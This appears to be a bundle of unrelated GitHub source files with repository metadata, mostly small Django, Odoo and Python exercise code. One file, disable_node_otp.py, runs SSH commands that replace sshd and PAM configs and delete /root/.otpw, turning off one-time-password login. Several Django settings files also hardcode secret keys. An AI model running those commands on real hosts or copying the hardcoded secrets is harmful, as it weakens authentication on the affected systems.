:param id: Gets or sets the unique identifier of the support topic.
:type id: int
:ivar attributes: Gets the attributes.
:vartype attributes:
~microsoft.store.partnercenterservices.models.MicrosoftPartnerSdkContractsV1CommonResourceAttributes
"""
_validation = {
'attributes': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'id': {'key': 'id', 'type': 'int'},
'attributes': {'key': 'attributes', 'type': 'MicrosoftPartnerSdkContractsV1CommonResourceAttributes'},
}
def __init__(self, name=None, description=None, id=None):
super(MicrosoftPartnerSdkContractsV1SupportTopic, self).__init__()
self.name = name
self.description = description
self.id = id
self.attributes = None
|
[
"eduardo.rodrigues@sentia.com"
] |
eduardo.rodrigues@sentia.com
|
8ac2409f5cb6f10f638f4a529a2f5abd608a6613
|
aacec9c81c1f015ac3f76d6e37d798e08b59d150
|
/sample/sample/settings.py
|
00ed6e4b6be213ff1107b7f54da769cb0c0096b0
|
[] |
no_license
|
meghalrag/djangoprgm
|
25ae32b04789dc9cdeda5ac64833e6e138234349
|
6a802a6b7a0c2044af24f4e0e90e034c0ba0d9ec
|
refs/heads/master
| 2020-05-19T22:20:51.979077
| 2019-05-06T18:05:42
| 2019-05-06T18:05:42
| 185,244,469
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,230
|
py
|
"""
Django settings for sample project.
Generated by 'django-admin startproject' using Django 1.11.6.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '+qn4gbqf!s-1qc_)bvtccf3n5x8*atnhkghn#99#-6yo*6b)(_'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'myapp',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'sample.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'sample.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
|
[
"noreply@github.com"
] |
meghalrag.noreply@github.com
|
3a0f2b78a917ebbb93b31b448eff17706496fcb4
|
55d6de252e61c4b60688ebd8b1f637807acc1e7c
|
/custom_customer_payment_approval/models/models.py
|
83b0d97f1108f7bbd53d5c29fe68c31b90a5209d
|
[] |
no_license
|
mosadiqit/eerna_erp_uslbd
|
b707a1d49a4fce7c1543b63e0120e8f9b77b26ce
|
73e3994a9e32df7809d244eb6592513162ab7853
|
refs/heads/main
| 2023-06-30T14:53:04.837197
| 2021-08-04T11:30:46
| 2021-08-04T11:30:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 590
|
py
|
# -*- coding: utf-8 -*-
# from odoo import models, fields, api
# class custom_customer_payment_approval(models.Model):
# _name = 'custom_customer_payment_approval.custom_customer_payment_approval'
# _description = 'custom_customer_payment_approval.custom_customer_payment_approval'
# name = fields.Char()
# value = fields.Integer()
# value2 = fields.Float(compute="_value_pc", store=True)
# description = fields.Text()
#
# @api.depends('value')
# def _value_pc(self):
# for record in self:
# record.value2 = float(record.value) / 100
|
[
"ibrahimalazhar264@gmail.com"
] |
ibrahimalazhar264@gmail.com
|
3eea2bcd2377a53c6ec3a0fac375d30816303266
|
ede10f744f89dcc7c81a73e922cfd41c8c415b3f
|
/setoperation.py
|
2dc31b509a25cf4a50900a49bc5f21b382e8ff7e
|
[] |
no_license
|
Techsrijan/Python11
|
6d76ac9aaa1fe30a1a31f7dbe898927b439ac64b
|
c1080fcc027044137859e4e55ef6a8d3cb740c2a
|
refs/heads/master
| 2020-06-16T07:02:38.150544
| 2019-08-04T03:29:15
| 2019-08-04T03:29:15
| 195,508,033
| 0
| 35
| null | 2019-07-28T07:48:25
| 2019-07-06T06:52:21
|
Python
|
UTF-8
|
Python
| false
| false
| 618
|
py
|
marks={11,12,15,66,12}
print(marks)
marks.add(555)
print(marks)
marks.remove(12)
print(marks)
fruit=frozenset(['apple','mango'])
print(fruit)
#fruit.add('ss')
# this will create dictionary but not set
a={}
print(a)
print(type(a))
# set function creates an empty set
b=set()
print(b)
print(type(b))
b= set(marks) #copy
print(b)
p={1,2,3,4}
q={4,5,61,1}
#union
print(p|q)
#intersection
print(p&q)
#difference
print(p-q) #which are in a but not in b
#symmetric difference
print(p^q)
print(p)
print(p.clear())
print(p)
#memebership operator
print(15 in marks)
print(15 not in marks)
x= q.copy()
print(x)
|
[
"aswanibtech@gmail.com"
] |
aswanibtech@gmail.com
|
137ba7136d89e5ece45a8d4271fd13561c4b608f
|
13f25be5c1f9d4023fdc188af20699370bbc896d
|
/billy/commands/update_external_ids.py
|
3e37a7f86791dc9da57d8eb46cbb0c11f1901cb7
|
[] |
no_license
|
JT5D/billy
|
d303ca408527e122faebdd1c1047233cf0231d8c
|
de1586fddd30d354d80d6b6b2c7932e16bc02991
|
refs/heads/master
| 2020-12-25T15:51:22.750561
| 2012-09-14T16:23:18
| 2012-09-14T16:23:18
| 5,826,718
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,540
|
py
|
import json
import urllib
import urllib2
import time
import sys
from billy import db
from billy.conf import settings
from billy.commands import BaseCommand
class UpdateMissingIds(BaseCommand):
name = 'update-ext-ids'
help = 'update TransparencyData ids'
def add_args(self):
self.add_argument('abbrs', metavar='ABBR', type=str, nargs='+',
help='abbreviations for data to update')
self.add_argument('--apikey', help='the API key to use',
dest='API_KEY')
def handle(self, args):
for abbr in args.abbrs:
meta = db.metadata.find_one({'_id': abbr.lower()})
if not meta:
print "'{0}' does not exist in the database.".format(abbr)
sys.exit(1)
else:
print "Updating ids for {0}".format(abbr)
print "Updating TransparencyData ids..."
current_term = meta['terms'][-1]['name']
query = {'roles': {'$elemMatch':
{'type': 'member',
settings.LEVEL_FIELD: meta['abbreviation'],
'term': current_term},
},
'transparencydata_id': None,
'active': True,
}
updated = 0
initial_count = db.legislators.find(query).count()
abbrev = meta['_id'].upper()
for leg in db.legislators.find(query):
query = urllib.urlencode({'apikey': settings.API_KEY,
'search': leg['full_name'].encode('utf8')})
url = ('http://transparencydata.com/api/1.0/entities.json?' +
query)
data = urllib2.urlopen(url).read()
results = json.loads(data)
matches = []
for result in results:
if (result['state'] == abbrev and
result['seat'][6:] == leg['chamber'] and
result['type'] == 'politician'):
matches.append(result)
if len(matches) == 1:
leg['transparencydata_id'] = matches[0]['id']
db.legislators.save(leg, safe=True)
updated += 1
print 'Updated %s of %s missing transparencydata ids' % (updated,
initial_count)
time.sleep(30)
|
[
"james.p.turk@gmail.com"
] |
james.p.turk@gmail.com
|
e20d78120e7e8e868e2796fbd0ad91445e24f16a
|
eea1c66c80784d4aefeb0d5fd2e186f9a3b1ac6e
|
/atcoder/abc/abc101-200/abc170/d.py
|
6f7baffcc4792acd400908f7b89a52f59bfb752e
|
[] |
no_license
|
reo11/AtCoder
|
4e99d6f40d8befe264761e3b8c33d3a6b7ba0fe9
|
69c6d67f05cb9190d8fb07204488cd7ce4d0bed2
|
refs/heads/master
| 2023-08-28T10:54:50.859288
| 2023-08-22T18:52:47
| 2023-08-22T18:52:47
| 162,085,118
| 4
| 0
| null | 2023-07-01T14:17:28
| 2018-12-17T06:31:10
|
Python
|
UTF-8
|
Python
| false
| false
| 357
|
py
|
import sys
from collections import Counter
input = sys.stdin.readline
MAX = 1000001
dp = [True for _ in range(MAX)]
n = int(input())
a = list(map(int, input().split()))
cnt = Counter(a)
a = sorted(list(set(a)))
ans = 0
for v in a:
if cnt[v] <= 1 and dp[v]:
ans += 1
m = v
while m < MAX:
dp[m] = False
m += v
print(ans)
|
[
"reohirao116@gmail.com"
] |
reohirao116@gmail.com
|
da1424b954c6ea7946bf5c4b741adee5647928ce
|
2e69d2f140bb653938dc1b7238b85a4af4754123
|
/metanic/settings/development.py
|
24903ea9e622fd8f43c25fe974be2913277bb0c6
|
[
"BSD-3-Clause"
] |
permissive
|
metanic/services
|
f866d78e7207624cf4b420929d987b6005394d1d
|
a00b99f9b697864a078e2cb886be4d75c10458a9
|
refs/heads/master
| 2021-06-06T22:33:56.823827
| 2018-08-14T08:05:00
| 2018-08-14T08:05:00
| 115,375,318
| 0
| 0
|
NOASSERTION
| 2020-02-11T21:34:25
| 2017-12-26T01:57:09
|
Python
|
UTF-8
|
Python
| false
| false
| 2,287
|
py
|
from metanic.settings.defaults import INSTALLED_APPS
from metanic.settings.defaults import MIDDLEWARE
from metanic.settings.defaults import REST_FRAMEWORK
from metanic.settings.defaults import cache_url
from metanic.settings.defaults import env_value
from metanic.settings.defaults import project_path
# We specifically allow `import *` in this case to pull in expected settings
from metanic.settings.defaults import * # noqa
DEBUG = True
DEFAULT_FROM_EMAIL = 'services@metanic.local'
FRONTEND_URL = env_value('frontend_url', 'http://localhost:3030/')
MEDIA_ROOT = project_path('media')
MEDIA_URL = '/media/'
METANIC_REDIRECT_URL = 'http://localhost:3030/'
ROOT_URLCONF = 'metanic.core.urls.development'
STATIC_ROOT = project_path('static')
STATIC_URL = '/static/'
MAILGUN_API_KEY = env_value('mailgun_api_key', default='TEST')
ANYMAIL['MAILGUN_API_KEY'] = MAILGUN_API_KEY
SECRET_KEY = env_value(
'secret_key',
'diagonal stunning powder ledge employ dealer',
)
ACCESS_CONTROL_ALLOW_ORIGINS = [
'localhost:3030',
]
REST_FRAMEWORK['DEFAULT_THROTTLE_CLASSES'] = []
REST_FRAMEWORK['DEFAULT_AUTHENTICATION_CLASSES'
] += ('rest_framework.authentication.SessionAuthentication',)
REST_FRAMEWORK['DEFAULT_THROTTLE_RATES'] = {
'anon': env_value('anon_throttle_rate', default='100/second'),
'sensitive': env_value('sensitive_throttle_rate', default='100/second'),
'user': env_value('user_throttle_rate', default='100/second'),
}
INSTALLED_APPS += [
'debug_toolbar',
'django_extensions',
]
STATICFILES_FINDERS = [
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
]
MIDDLEWARE += [
'debug_toolbar.middleware.DebugToolbarMiddleware',
]
CACHES = {
'default': cache_url('redis://localhost:6379/0'),
}
DATABASES = {
'default':
{
'ENGINE':
'django.db.backends.sqlite3',
'NAME':
project_path(
env_value('DATABASE_FILENAME', 'metanic.sqlite3')
),
},
}
ALLOWED_HOSTS = [
'localhost',
'metanic.local',
]
ACCESS_CONTROL_ALLOW_ORIGINS = [
'::1:',
'127.0.0.1',
'127.0.0.1:*',
'localhost',
'localhost:*',
'metanic.local',
'metanic.local:*',
]
INTERNAL_IPS = [
'127.0.0.1',
]
|
[
"monokrome@monokro.me"
] |
monokrome@monokro.me
|
b8b6b730b3d1e9345cd8228e34aab0f42a31aa8c
|
f305f84ea6f721c2391300f0a60e21d2ce14f2a5
|
/19_数学/数论/BSGS/G - 222.py
|
6cdc9f5606b73ac8778ecd183c8606680b877f35
|
[] |
no_license
|
981377660LMT/algorithm-study
|
f2ada3e6959338ae1bc21934a84f7314a8ecff82
|
7e79e26bb8f641868561b186e34c1127ed63c9e0
|
refs/heads/master
| 2023-09-01T18:26:16.525579
| 2023-09-01T12:21:58
| 2023-09-01T12:21:58
| 385,861,235
| 225
| 24
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 630
|
py
|
# 形如2,22,222,...的数列
# !这个数列第一个k的倍数的项是否存在, 若存在是第几项
# k<=1e8
# !等价于 2*(10^x-1)/9 ≡ 0 (mod k)
# !即 10^x ≡ 1 (mod k*9/gcd(k,2))
from math import gcd
from bsgs import exbsgs
# 即为扩展exbsgs
# TODO 有问题
import sys
sys.setrecursionlimit(int(1e9))
input = lambda: sys.stdin.readline().rstrip("\r\n")
MOD = 998244353
INF = int(4e18)
def find(k: int) -> int:
return exbsgs(10, 1, k * 9 // gcd(k, 2))
if __name__ == "__main__":
T = int(input())
for _ in range(T):
k = int(input())
print(find(k))
|
[
"lmt2818088@gmail.com"
] |
lmt2818088@gmail.com
|
94f9719ea3bafb52fb5ea71541380aa245912c33
|
afdeedfb743fbb149d36c14cfad65feaf03acd21
|
/code/1253-reconstruct-a-2-row-binary-matrix.py
|
bd9cbd79b960e9959b96f36d73f49227eb0ec9fe
|
[] |
no_license
|
linhx13/leetcode-code
|
f16cd4a0d35be34c41b86715fc9f3e8ec4b0a577
|
c71574acfc68174a091c1751f10985b8f5737a1f
|
refs/heads/master
| 2021-07-04T03:45:20.030275
| 2021-06-09T13:55:18
| 2021-06-09T13:55:18
| 70,423,464
| 0
| 1
| null | 2019-08-01T09:37:49
| 2016-10-09T18:48:33
| null |
UTF-8
|
Python
| false
| false
| 870
|
py
|
from typing import List
class Solution:
def reconstructMatrix(
self, upper: int, lower: int, colsum: List[int]
) -> List[List[int]]:
n = len(colsum)
res = [[0] * n for _ in range(2)]
for i, s in enumerate(colsum):
if s == 2 or (s == 1 and lower < upper):
res[0][i] = 1
if s == 2 or (s == 1 and not res[0][i]):
res[1][i] = 1
upper -= res[0][i]
lower -= res[1][i]
if lower == 0 and upper == 0:
return res
else:
return []
if __name__ == "__main__":
# upper = 2
# lower = 3
# colsum = [2, 2, 1, 1]
upper = 5
lower = 5
colsum = [2, 1, 2, 0, 1, 0, 1, 2, 0, 1]
# upper = 1
# lower = 4
# colsum = [2, 1, 2, 0, 0, 2]
print(Solution().reconstructMatrix(upper, lower, colsum))
|
[
"mylhx288@gmail.com"
] |
mylhx288@gmail.com
|
3ee47a3f3fcc17860c659aea5450baf56dda10e5
|
312ab41033c2cb043d617d3e633c166503fd280c
|
/Informatikk/Bachelor/H2017/ITGK/Eksamner/2012/Oppgave_4f.py
|
aa7ca178ffff91e045fd53d574fa57141adaeafe
|
[] |
no_license
|
skanin/NTNU
|
cb9b833d9de0d504965979584370b8f353435cd1
|
e4023856f69060f8d3d09ff4990e29f7a75d98b1
|
refs/heads/master
| 2022-01-30T14:31:22.947512
| 2022-01-20T14:11:14
| 2022-01-20T14:11:14
| 113,476,017
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 506
|
py
|
def strange_weather(temp, rain):
x = None
y = None
for i in range(len(temp)-1):
if temp[i] < 0:
if temp[i] < temp[i+1] and rain[i] < rain[i+1]:
x = i
if temp[i] > temp[i+1] and rain[i] > rain[i+1]:
y = i
return x, y
return 0, 0
temp=[1,3, 4,-5,-6,-7,-8,-9,3,0]
rain=[0,20,30,0,10,30,50,0,5,2]
(start, stop) = strange_weather(temp, rain)
print("Start: " + str(start))
print("Stop: ", str(stop))
|
[
"sander.b.lindberg@gmail.com"
] |
sander.b.lindberg@gmail.com
|
ed6ba51a1f51da4a70789894dbbc3c28652b12bf
|
a08225934c425be313a12975c9563a72ded58be6
|
/round669/q1.py
|
851433744811d0efac4f1b094d4089b7adb1d6ae
|
[] |
no_license
|
marcus-aurelianus/codeforce
|
27c966554dee9986f23fb2925bd53e6cceb8b9e9
|
4764df151ade7806e32b6c88283a2de946f99e16
|
refs/heads/master
| 2023-03-18T09:30:55.042594
| 2021-03-12T18:14:08
| 2021-03-12T18:14:08
| 231,387,022
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 932
|
py
|
import sys
reader = (s.rstrip() for s in sys.stdin)
input = reader.__next__
def gift():
for _ in range(t):
n = int(input())
arry = list(map(int,input().split()))
count0 = 0
count1 = 0
for i in range(n):
if arry[i] == 1:
count1 += 1
else:
count0 += 1
if count0>count1:
if count0%2:
count0-=1
yield count0
yield " ".join(str(x) for x in count0*[0])
elif count0<count1:
if count1%2:
count1-=1
yield count1
yield " ".join(str(x) for x in count1*[1])
else:
yield count0
yield " ".join(str(x) for x in count0*[0])
if __name__ == '__main__':
t= int(input())
ans = gift()
print(*ans,sep='\n')
#"{} {} {}".format(maxele,minele,minele)
#1 0 1 0 1 0
|
[
"37787424+marcus-aurelianus@users.noreply.github.com"
] |
37787424+marcus-aurelianus@users.noreply.github.com
|
eff344fe4db23e7846abced170514cefc8dc4524
|
2031771d8c226806a0b35c3579af990dd0747e64
|
/pyobjc-framework-GameKit/PyObjCTest/test_gkleaderboardset.py
|
07d32c0476b2648b0ec250082721e960bbc9e8b1
|
[
"MIT"
] |
permissive
|
GreatFruitOmsk/pyobjc-mirror
|
a146b5363a5e39181f09761087fd854127c07c86
|
4f4cf0e4416ea67240633077e5665f5ed9724140
|
refs/heads/master
| 2018-12-22T12:38:52.382389
| 2018-11-12T09:54:18
| 2018-11-12T09:54:18
| 109,211,701
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 638
|
py
|
from PyObjCTools.TestSupport import *
import GameKit
class TestGKLeaderboardSet (TestCase):
@min_os_level('10.10')
def testMethods(self):
class TestGKLeaderboardSetHelper (GameKit.GKLeaderboardSet):
def loadImageWithCompletionHandler_(self, h): pass
self.assertArgIsBlock(GameKit.GKLeaderboardSet.loadLeaderboardSetsWithCompletionHandler_, 0, b'v@@')
self.assertArgIsBlock(GameKit.GKLeaderboardSet.loadLeaderboardsWithCompletionHandler_, 0, b'v@@')
self.assertArgIsBlock(TestGKLeaderboardSetHelper.loadImageWithCompletionHandler_, 0, b'v@@')
if __name__ == "__main__":
main()
|
[
"ronaldoussoren@mac.com"
] |
ronaldoussoren@mac.com
|
cc5944b4c83a4775a2bb0eb3623f8812a6f2e3ac
|
c4a2c5d2ee3bb946333bec267c337858c2eaa87c
|
/tests/bhive/test_asciichart.py
|
33f157a84494dea26f1582b0203b3aa21810eb53
|
[
"MIT"
] |
permissive
|
TheCrazyGM/bhive
|
93b237140def25a8cb4de0160678db116b45d4e0
|
1494e90a99123ecfc5efbd927258f9ba59443e2e
|
refs/heads/master
| 2021-04-10T20:15:59.966431
| 2020-03-22T23:50:52
| 2020-03-22T23:50:52
| 248,962,200
| 3
| 1
|
NOASSERTION
| 2020-10-27T22:24:53
| 2020-03-21T11:29:02
|
Python
|
UTF-8
|
Python
| false
| false
| 1,211
|
py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from builtins import bytes
from builtins import range
from builtins import super
import string
import random
import unittest
import base64
from pprint import pprint
from bhive.asciichart import AsciiChart
class Testcases(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.curve = [1.2, 4.3, 2.0, -1.3, 6.4, 0.]
def test_plot(self):
ac = AsciiChart(height=3, width=3)
self.assertEqual(len(ac.canvas), 0)
ret = ac.plot(self.curve, return_str=True)
ac.plot(self.curve, return_str=False)
self.assertTrue(len(ret) > 0)
ac.clear_data()
self.assertEqual(len(ac.canvas), 0)
def test_plot2(self):
ac = AsciiChart(height=3, width=3)
ac.clear_data()
ac.adapt_on_series(self.curve)
self.assertEqual(ac.maximum, max(self.curve))
self.assertEqual(ac.minimum, min(self.curve))
self.assertEqual(ac.n, len(self.curve))
ac.new_chart()
ac.add_axis()
ac.add_curve(self.curve)
|
[
"thecrazygm@gmail.com"
] |
thecrazygm@gmail.com
|
71f6ad5a698c326f96d84161d38f7a08056340a5
|
75e03232591b263a50523d7cfef4041db36caf01
|
/VMWsolutions/at2-vclient-032/cft/disable_node_otp.py
|
e3092e047d6ae3d778a3ded3eac14088fc42a51c
|
[] |
no_license
|
adamkittel/src
|
aaf157062d069998a8d18841895e7362cf868ff9
|
11e3927bd990b885eba595346694de2d2601d5c9
|
refs/heads/master
| 2021-01-11T16:13:14.592894
| 2017-01-25T18:29:09
| 2017-01-25T18:29:09
| 80,040,934
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,634
|
py
|
#!/usr/bin/python
"""
This action will disable OTP on a set of nodes
When run as a script, the following options/env variables apply:
--node_ips The list of node management IP addresses
SFNODE_IPS
--ssh_user The nodes SSH username
SFSSH_USER env var
--ssh_pass The nodes SSH password
SFSSH_PASS
"""
import sys
from optparse import OptionParser
import lib.libsf as libsf
from lib.libsf import mylog
import otp.libotp as libotp
import logging
import lib.sfdefaults as sfdefaults
from lib.action_base import ActionBase
from lib.datastore import SharedValues
class DisableNodeOtpAction(ActionBase):
class Events:
"""
Events that this action defines
"""
FAILURE = "FAILURE"
def __init__(self):
super(self.__class__, self).__init__(self.__class__.Events)
def ValidateArgs(self, args):
libsf.ValidateArgs({"node_ips" : libsf.IsValidIpv4AddressList},
args)
def Execute(self, node_ips=None, ssh_user=sfdefaults.ssh_user, ssh_pass=sfdefaults.ssh_pass, debug=False):
"""
Disable OTP on a list of nodes
"""
if not node_ips:
node_ips = sfdefaults.node_ips
self.ValidateArgs(locals())
if debug:
mylog.console.setLevel(logging.DEBUG)
allgood = True
for node_ip in node_ips:
try:
mylog.info(node_ip + ": Removing OTP config")
libotp.ExecSshCommand(node_ip, ssh_user, ssh_pass, "cp /sf/backup/sshd_config /etc/sshd; cp /sf/backup/sshd /etc/pam.d; rm -f /root/.otpw")
libotp.ExecSshCommand(node_ip, ssh_user, ssh_pass, "service ssh restart")
except libsf.SfError as e:
mylog.error(node_ip + ": " + str(e))
self.RaiseFailureEvent(message=str(e), nodeIP=node_ip, exception=e)
allgood = False
if allgood:
mylog.passed("Successfully disabled OTP on all nodes")
return True
else:
mylog.error("Failed to disable OTP on all nodes")
return False
# Instantate the class and add its attributes to the module
# This allows it to be executed simply as module_name.Execute
libsf.PopulateActionModule(sys.modules[__name__])
if __name__ == '__main__':
mylog.debug("Starting " + str(sys.argv))
# Parse command line arguments
parser = OptionParser(option_class=libsf.ListOption, description=libsf.GetFirstLine(sys.modules[__name__].__doc__))
parser.add_option("-n", "--node_ips", action="list", dest="node_ips", default=None, help="the IP addresses of the nodes")
parser.add_option("--ssh_user", type="string", dest="ssh_user", default=sfdefaults.ssh_user, help="the SSH username for the nodes")
parser.add_option("--ssh_pass", type="string", dest="ssh_pass", default=sfdefaults.ssh_pass, help="the SSH password for the nodes")
parser.add_option("--debug", action="store_true", dest="debug", default=False, help="display more verbose messages")
(options, extra_args) = parser.parse_args()
try:
timer = libsf.ScriptTimer()
if Execute(options.node_ips, options.ssh_user, options.ssh_pass, options.debug):
sys.exit(0)
else:
sys.exit(1)
except libsf.SfArgumentError as e:
mylog.error("Invalid arguments - \n" + str(e))
sys.exit(1)
except SystemExit:
raise
except KeyboardInterrupt:
mylog.warning("Aborted by user")
Abort()
sys.exit(1)
except:
mylog.exception("Unhandled exception")
sys.exit(1)
|
[
"adam.kittel@solidfire.com"
] |
adam.kittel@solidfire.com
|
366fff143610fe845b7b6e6395ef18c03343fd2a
|
a468016412cc2b435501de4d3ee5c4d2be5fa19f
|
/coupons/models.py
|
305be09c0686ea6f5f965be1fc9468e3968e0bac
|
[] |
no_license
|
sadakchap/first-full-ecom
|
ef022596c05c29cae0842bae34d201cd4af08b93
|
881b39ec60dff3aef04105e3d08e3be3e16f6420
|
refs/heads/master
| 2020-08-07T05:02:48.165873
| 2019-10-07T06:16:16
| 2019-10-07T06:16:16
| 213,308,847
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 485
|
py
|
from django.db import models
from django.core.validators import MinValueValidator,MaxValueValidator
# Create your models here.
class Coupon(models.Model):
code = models.CharField(max_length=255,unique=True)
valid_from = models.DateTimeField()
valid_to = models.DateTimeField()
discount = models.IntegerField(validators=[MinValueValidator(0),MaxValueValidator(100)])
active = models.BooleanField()
def __str__(self):
return self.code
|
[
"aliceprerna@gmail.com"
] |
aliceprerna@gmail.com
|
5f4574f19704732b35e9a1608f3760eaacfdcd64
|
bd93fa910151c278be8249055bc084e5a5c35a6a
|
/Python/itcast/01-Python进阶1/3面向对象/02魔法方法str.py
|
87b7cb966fb02fd2b8c31c726aea63b56963dabb
|
[] |
no_license
|
ahojcn/practice-code
|
bd81595b80239cd2550183093566bd536a83ed3f
|
b65f4e76271479269463e92fd3fd41585c2ac792
|
refs/heads/master
| 2021-07-10T14:15:08.036592
| 2020-07-09T11:32:16
| 2020-07-09T11:32:16
| 153,059,349
| 2
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 717
|
py
|
"""
__str__ 相当于 Java 中的 toString()
"""
class Cat:
def __init__(self, name, age, sex):
self._name = name
self._age = age
self._sex = sex
def __str__(self):
return "姓名:" + self._name \
+ "年龄:" + str(self._age) \
+ "性别:" + self._sex
def eat(self):
print(self._name + "吃鱼...")
def drink(self):
print(self._name + "喝可乐...")
def info(self):
print("name:" + self._name + \
", age:" + str(self._age) + \
", sex:" + self._sex)
tom = Cat("汤姆", 20, "男")
print(tom)
print(" 分界线 ".center(50, "*"))
lanmao = Cat("蓝猫", 10, "女")
print(lanmao)
|
[
"hanoi_ahoj@icloud.com"
] |
hanoi_ahoj@icloud.com
|
e81a46145ac0da82da2536133a7c0a69c8ffc392
|
7c82896f5322ffd5d61697ed597f4d2c53e4e744
|
/backend/ecommernce_25667/wsgi.py
|
16d515f35532223e7e77c29bf39f2a5ff06566df
|
[] |
no_license
|
crowdbotics-apps/ecommernce-25667
|
c4487f6c19a3d4dc608fd2a13291f74c84b53dc7
|
55dd1c6293fcfbec01aec7e8e0118ed8b1c48130
|
refs/heads/master
| 2023-04-02T00:48:51.026549
| 2021-04-13T19:40:25
| 2021-04-13T19:40:25
| 357,668,171
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 409
|
py
|
"""
WSGI config for ecommernce_25667 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ecommernce_25667.settings")
application = get_wsgi_application()
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
539f8f2da156d8b3ce8a755659f688fe6ee1d71e
|
a1119965e2e3bdc40126fd92f4b4b8ee7016dfca
|
/branches/nacl_repy/seattlelib/serialize.repy
|
29a142d7996092ac9787ccb13497c54fdc3571d5
|
[
"MIT"
] |
permissive
|
SeattleTestbed/attic
|
0e33211ddf39efdbcf5573d4fc7fa5201aa7310d
|
f618a962ce2fd3c4838564e8c62c10924f5df45f
|
refs/heads/master
| 2021-06-10T23:10:47.792847
| 2017-05-15T12:05:43
| 2017-05-15T12:05:43
| 20,154,061
| 0
| 1
| null | 2014-10-16T17:21:06
| 2014-05-25T12:34:00
|
Python
|
UTF-8
|
Python
| false
| false
| 6,493
|
repy
|
"""
Author: Justin Cappos
Start date: October 9th, 2009
Purpose: A simple library that serializes and deserializes built-in repy types.
This includes strings, integers, floats, booleans, None, complex, tuples,
lists, sets, frozensets, and dictionaries.
There are no plans for including objects.
Note: that all items are treated as separate references. This means things
like 'a = []; a.append(a)' will result in an infinite loop. If you have
'b = []; c = (b,b)' then 'c[0] is c[1]' is True. After deserialization
'c[0] is c[1]' is False.
I can add support or detection of this if desired.
"""
# The basic idea is simple. Say the type (a character) followed by the
# type specific data. This is adequate for simple types
# that do not contain other types. Types that contain other types, have
# a length indicator and then the underlying items listed sequentially.
# For a dict, this is key1value1key2value2.
def serializedata(data):
"""
<Purpose>
Convert a data item of any type into a string such that we can
deserialize it later.
<Arguments>
data: the thing to seriailize. Can be of essentially any type except
objects.
<Exceptions>
TypeError if the type of 'data' isn't allowed
<Side Effects>
None.
<Returns>
A string suitable for deserialization.
"""
# this is essentially one huge case statement...
# None
if type(data) == type(None):
return 'N'
# Boolean
elif type(data) == type(True):
if data == True:
return 'BT'
else:
return 'BF'
# Integer / Long
elif type(data) is int or type(data) is long:
datastr = str(data)
return 'I'+datastr
# Float
elif type(data) is float:
datastr = str(data)
return 'F'+datastr
# Complex
elif type(data) is complex:
datastr = str(data)
if datastr[0] == '(' and datastr[-1] == ')':
datastr = datastr[1:-1]
return 'C'+datastr
# String
elif type(data) is str:
return 'S'+data
# List or tuple or set or frozenset
elif type(data) is list or type(data) is tuple or type(data) is set or type(data) is frozenset:
# the only impact is the first letter...
if type(data) is list:
mystr = 'L'
elif type(data) is tuple:
